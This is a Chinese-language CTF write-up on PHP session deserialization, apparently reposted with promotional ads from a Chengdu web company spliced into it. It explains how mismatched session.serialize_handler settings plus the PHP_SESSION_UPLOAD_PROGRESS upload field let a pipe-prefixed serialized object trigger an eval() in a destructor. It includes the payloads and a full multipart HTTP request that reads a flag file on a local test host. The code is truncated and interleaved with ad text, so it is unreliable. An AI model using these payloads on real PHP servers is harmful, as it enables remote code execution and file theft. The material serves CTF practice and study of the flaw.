- php存儲session的三種模式
php_serialize(php=>5.5.4) 
成都創(chuàng)新互聯(lián)公司是一家專業(yè)的成都網(wǎng)站建設(shè)公司�����,我們專注成都網(wǎng)站建設(shè)、網(wǎng)站制作、網(wǎng)絡(luò)營銷�、企業(yè)網(wǎng)站建設(shè)�,外鏈,一元廣告為企業(yè)客戶提供一站式建站解決方案���,能帶給客戶新的互聯(lián)網(wǎng)理念����。從網(wǎng)站結(jié)構(gòu)的規(guī)劃UI設(shè)計到用戶體驗提高�����,創(chuàng)新互聯(lián)力求做到盡善盡美���。 | 經(jīng)過serialize()函數(shù)序列化數(shù)組 |
php | 鍵名+豎線+經(jīng)過seralize()序列處理的值 |
php_biary | 鍵名的長度對應(yīng)ASCII字符+鍵名+serialize()序列化的值 |
測試代碼
//ini_set("session.serialize_handler", "php");
//ini_set("session.serialize_handler", "php_serialize");
ini_set("session.serialize_handler", "php_binary");?
session_start();
$_SESSION['moonsec'] = $_GET['moonsec'];
序列化存儲格式
php
moonsec|s:3:"123";
php_serialize
a:1:{s:7:"moonsec";s:3:"123";}
php_binary
<0x07>moonsecs:3:"123";
2.CTF題目? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??
mdzz = 'phpinfo();';
}
function __destruct()
{
eval($this->mdzz);
}
}
if(isset($_GET['phpinfo']))
{
$m = new CTF();
}
else
{
highlight_string(file_get_contents('index.php'));
}
?>
條件? ? ? ? ?
- session.serialize_handler? php 局部變量 php_serialize 主變量
- session.upload_progress.cleanup 默認(rèn)開啟 現(xiàn)關(guān)閉
- session.upload_progress.enabled 默認(rèn)開啟
php bug
PHP :: Doc Bug #71101 :: serialize_handler must not be switched for existing sessions
session.upload_progress.enabled? On
session.upload_progress.enabled本身作用不大,是用來檢測一個文件上傳的進(jìn)度��。但當(dāng)一個文件上傳時����,同時POST一個與php.ini中session.upload_progress.name同名的變量時(session.upload_progress.name的變量值默認(rèn)為PHP_SESSION_UPLOAD_PROGRESS),PHP檢測到這種同名請求會在$_SESSION中添加一條數(shù)據(jù)�。由此來設(shè)置session
序列化
mdzz = 'print_r(scandir(dirname(__FILE__)));';
}
function __destruct()
{
eval($this->mdzz);
}
}
$m = new CTF();
echo serialize($m);
?>
O:3:"CTF":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}上傳表單??
upload
|O:3:\"CTF\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}? ? ? ? ? ? ?
讀flag
O:3:"CTF":1:{s:4:"mdzz";s:83:"print_r(file_get_contents("D:/phpstudy_pro/WWW/www.test1.com/ctf/demo3/flag.php"));";|O:3:\"CTF\":1:{s:4:\"mdzz\";s:83:\"print_r(file_get_contents(\"D:/phpstudy_pro/WWW/www.test1.com/ctf/demo3/flag.php\"));\";
POST /ctf/demo3/index.php HTTP/1.1
Host: www.test1.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------11171372103466141198728743662
Content-Length: 39314
Origin: http://www.test1.com
Connection: close
Referer: http://www.test1.com/ctf/demo3/upload.html
Cookie: PHPSESSID=p13eoiiiq3rp69k85an1d2idbu
Upgrade-Insecure-Requests: 1
-----------------------------11171372103466141198728743662
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
1
-----------------------------11171372103466141198728743662
Content-Disposition: form-data; name="file"; filename="|O:3:\"CTF\":1:{s:4:\"mdzz\";s:83:\"print_r(file_get_contents(\"D:/phpstudy_pro/WWW/www.test1.com/ctf/demo3/flag.php\"));\";}
Content-Type: image/png
你是否還在尋找穩(wěn)定的海外服務(wù)器提供商����?創(chuàng)新互聯(lián)www.cdcxhl.cn海外機(jī)房具備T級流量清洗系統(tǒng)配攻擊溯源��,準(zhǔn)確流量調(diào)度確保服務(wù)器高可用性��,企業(yè)級服務(wù)器適合批量采購�����,新人活動首月15元起����,快前往官網(wǎng)查看詳情吧
文章題目:PHP反序列化與SESSION-創(chuàng)新互聯(lián)
當(dāng)前路徑:
http://weahome.cn/article/djopih.html
重慶分公司
重慶分公司
